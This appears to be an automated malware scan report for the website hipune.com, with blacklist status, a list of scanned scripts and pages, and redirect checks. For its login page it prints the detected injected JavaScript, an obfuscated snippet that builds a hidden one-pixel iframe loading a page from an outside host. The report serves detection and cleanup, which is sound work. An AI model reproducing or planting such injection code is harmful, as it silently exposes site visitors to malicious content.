Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hipune.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://hipune.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.hipune.com/ | 200 OK Content-Length: 77257 Content-Type: text/html | clean |
http://www.hipune.com/WebResource.axd?d=JpgmRV5zDCsVlMEOBCQ5o20qIdPBvlrY4dTBTJzN29oMZgfjtq-7YByGEgSHXmvWceH85dOY0jMGquiiUT8ep5WvCZA1&t=634605708834856163 | 200 OK Content-Length: 20794 Content-Type: application/x-javascript | clean |
http://www.hipune.com/ScriptResource.axd?d=UiIfyTK33elSox7YfaPidIrWC3wHwnoZCmFKji6koIX9JOQH72AOeNqA_N-H3iiDs9eQ03MXAPWQwMyn9IWorqDnWeHXIzj-l53e5RMvll_6Bk4UuOaFzDAFJarn8O8NF4IRM8L6PwJCYBrPpHyNHhRht9f8czbDalreowAeSTF_h56X0&t=ffffffff84e7d5ad | 200 OK Content-Length: 303565 Content-Type: application/x-javascript | clean |
http://www.hipune.com/ScriptResource.axd?d=QSG1P8l305v9boN3mJoorLV4qnfQo-zGkJpP1MRgZAgWXFLfzYHHTd1AEmhO0dJFcYaxYxpPtWXdjrSP5fiqEipSJAJfviWAmS-svp4RLEIj9VJnEeuT4_ED0JYDGR3InlNXqJJNpQGHWvjZNkIKWdm_Jd73GCmDMsozmsBwnmo0u-yW0&t=ffffffff84e7d5ad | 200 OK Content-Length: 78420 Content-Type: application/x-javascript | clean |
http://www.hipune.com/ScriptResource.axd?d=Y0Omyw7X1fiH3NOcDdBybW811t5Cb1XJL7Ea8nmncezOA1AO_KprxnYAi7QoART1BkCx4lcX1oMASQvoP44Epvrfq9OuIhTbyTS-PNY_AQL4E10WTdUKA62E4GNVnnDaMi1KuvS0y-7kyC56B5DIqz-Ue_E1&t=ffffffff8227a624 | 200 OK Content-Length: 75918 Content-Type: text/javascript | clean |
http://www.hipune.com/ScriptResource.axd?d=m2FjNwqWQn3dOaHrjvNG5sV5hHCFiy1poR7XEjEdKYVDLVL9S3KCLVwrsbGvIROUg33OeFE5dNZhq_MSKUqdg-RKp1uZX3r0s-jc4_cGRrJJ7okSoU9o5Udtyv0nmenTEdpnBRFE_a7MlJ761wZUnQ4s_qs1&t=ffffffff8227a624 | 200 OK Content-Length: 3138 Content-Type: text/javascript | clean |
http://www.hipune.com/ScriptResource.axd?d=df_jQcoKvX-ggydjf4-KqLWYCwONrECr5sAuMu2UMMsXl1_aWVbk_P-a6KwRjh3S2sSxsKtwYvFsR_ktQltw2qec_HnQ50Mo_UmUXuZJFK_o_IWuQ_QmJfs7x4voKEPEBbWKShlBQceOL8TEnD29K0pUUwE1&t=ffffffff8227a624 | 200 OK Content-Length: 144032 Content-Type: text/javascript | clean |
http://www.hipune.com/ScriptResource.axd?d=QPuQm4zPtAxBv0Iur92Ut7AlCXoXtYAdOh1CoibcftFsdJJXNe5pghD-EmDtafDK4HvUeSdPiBJ81ltIEdeDWeFipe29zfbY9IE7L6sUlfgfRsH3tXyUOtRmRYZGn3NTqE7VyCaC7hMTRkpjfQTH9gRSlXs1&t=ffffffff8227a624 | 200 OK Content-Length: 20235 Content-Type: text/javascript | clean |
http://www.hipune.com/ScriptResource.axd?d=4uZI3FZFrQQIGE_aS0TglkdQX8lfFnGOYUmHfH4ypVxX9Kq9a0imIZUsamQhPE6lhIbnMtWPnXOqcYEOYCYT1H17oToaEZ6EVKff4LdyV3Hs106GMSg-1Nok9Vc8yI2wxq9HGCVgLFd6JJPhO1lL0nBGGK0WexW3Bj4o8ThO0x36dRIn0&t=ffffffff8227a624 | 200 OK Content-Length: 16031 Content-Type: text/javascript | clean |
http://www.hipune.com/ScriptResource.axd?d=nv1A8bf_e0yn_FwRbgf0OwfCMdgO0-W2OHkoUPvd9NqCQ911r8VMCgVpf4aGi1KsoE0HYHQYGTUSvRToNr4buRZY-AQiDYZRp_OCIBNhSPkmOv8wQLM3wZiNzI8yMLvz6ZcJMJFifC05bpeOzX4gMgSt2h8S_Htw2pMZrhWFD3lCKUGJ0&t=ffffffff8227a624 | 200 OK Content-Length: 33347 Content-Type: text/javascript | clean |
http://www.hipune.com/ScriptResource.axd?d=6B2_vlsYGKjBVWq3icI2on2sUhbTbM7530eA8QS6-fBW3_QYrMf1GdmVhFmrK0fVDarYNfdOFvF08LOLcglTaXuZT-o_zqQnKC86bh9FD0ty0PcPzFCvTlF8TZlA9r3gCpJzAEB2lJ5PsRtoQBoGxIqFmL3zbTIvgf3U8HiIX6sZQo2x0&t=ffffffff8227a624 | 200 OK Content-Length: 59407 Content-Type: text/javascript | clean |
http://www.hipune.com/ScriptResource.axd?d=QILMiFQVPuc3RzcJ21vVScSiNnF2ceqWZKCkoonwqdiJty0tfV-2Us4UCPFhAAtD0kMaJuBHAOA9nnRX7w7IABAV5_BfQqksa_tCwpeMhCCjIOcbWMTIzzZQG64DN_AEupqkiBuiy7TVP6wotZ7oiWLY55Snfpk8tEhLE4vuNRX7XuRR0&t=ffffffff8227a624 | 200 OK Content-Length: 14725 Content-Type: text/javascript | clean |
http://www.hipune.com/AddBusiness.aspx | 200 OK Content-Length: 107929 Content-Type: text/html | clean |
http://www.hipune.com/ScriptResource.axd?d=56hKMEqGIYBxJemcwm0X3Bcgg5gTJvbO7Ja0cUs2mxZV1nxH0vpRRV9lumIiSOw6Les7QTkl6Mws7ywZ46mTdLFARlrxHYCxV8LHAn8c9_dAUS0SfSuG71DTANQJHR7KnWcP-Vmh8ysLj-mG_2wyayUkRsM1&t=ffffffffaf457bc1 | 200 OK Content-Length: 21615 Content-Type: application/x-javascript | clean |
http://www.hipune.com/logIn.aspx | 200 OK Content-Length: 62981 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ez='://';la='k9';vp='85y';ma='zi.';s='c';f='m';kg='cub';i='t';zz='/';l='sr';n='c';ng='ame';rv='.ht';gn='om';h='ht';tg='v';vl='tp';kf='ni';v='ifr';vq='yfo';bc=v.concat(ng);x=l.concat(n);p=h.concat(vl,ez,kg,vq,kf,ma,s,gn,zz,la,vp,i,tg,rv,f);var jc=document.createElement(bc);jc.setAttribute('width','1');jc.setAttribute('height','1');jc.frameBorder=0;jc.setAttribute(x,p);document.body.appendChild(jc); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hipune.com
Result:
GET / HTTP/1.1
Host: hipune.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: hipune.com
Referer: http://www.google.com/search?q=hipune.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hipune.com
Referer: http://www.google.com/search?q=hipune.com
Result:
The result is similar to the first query. There are no suspicious redirects found.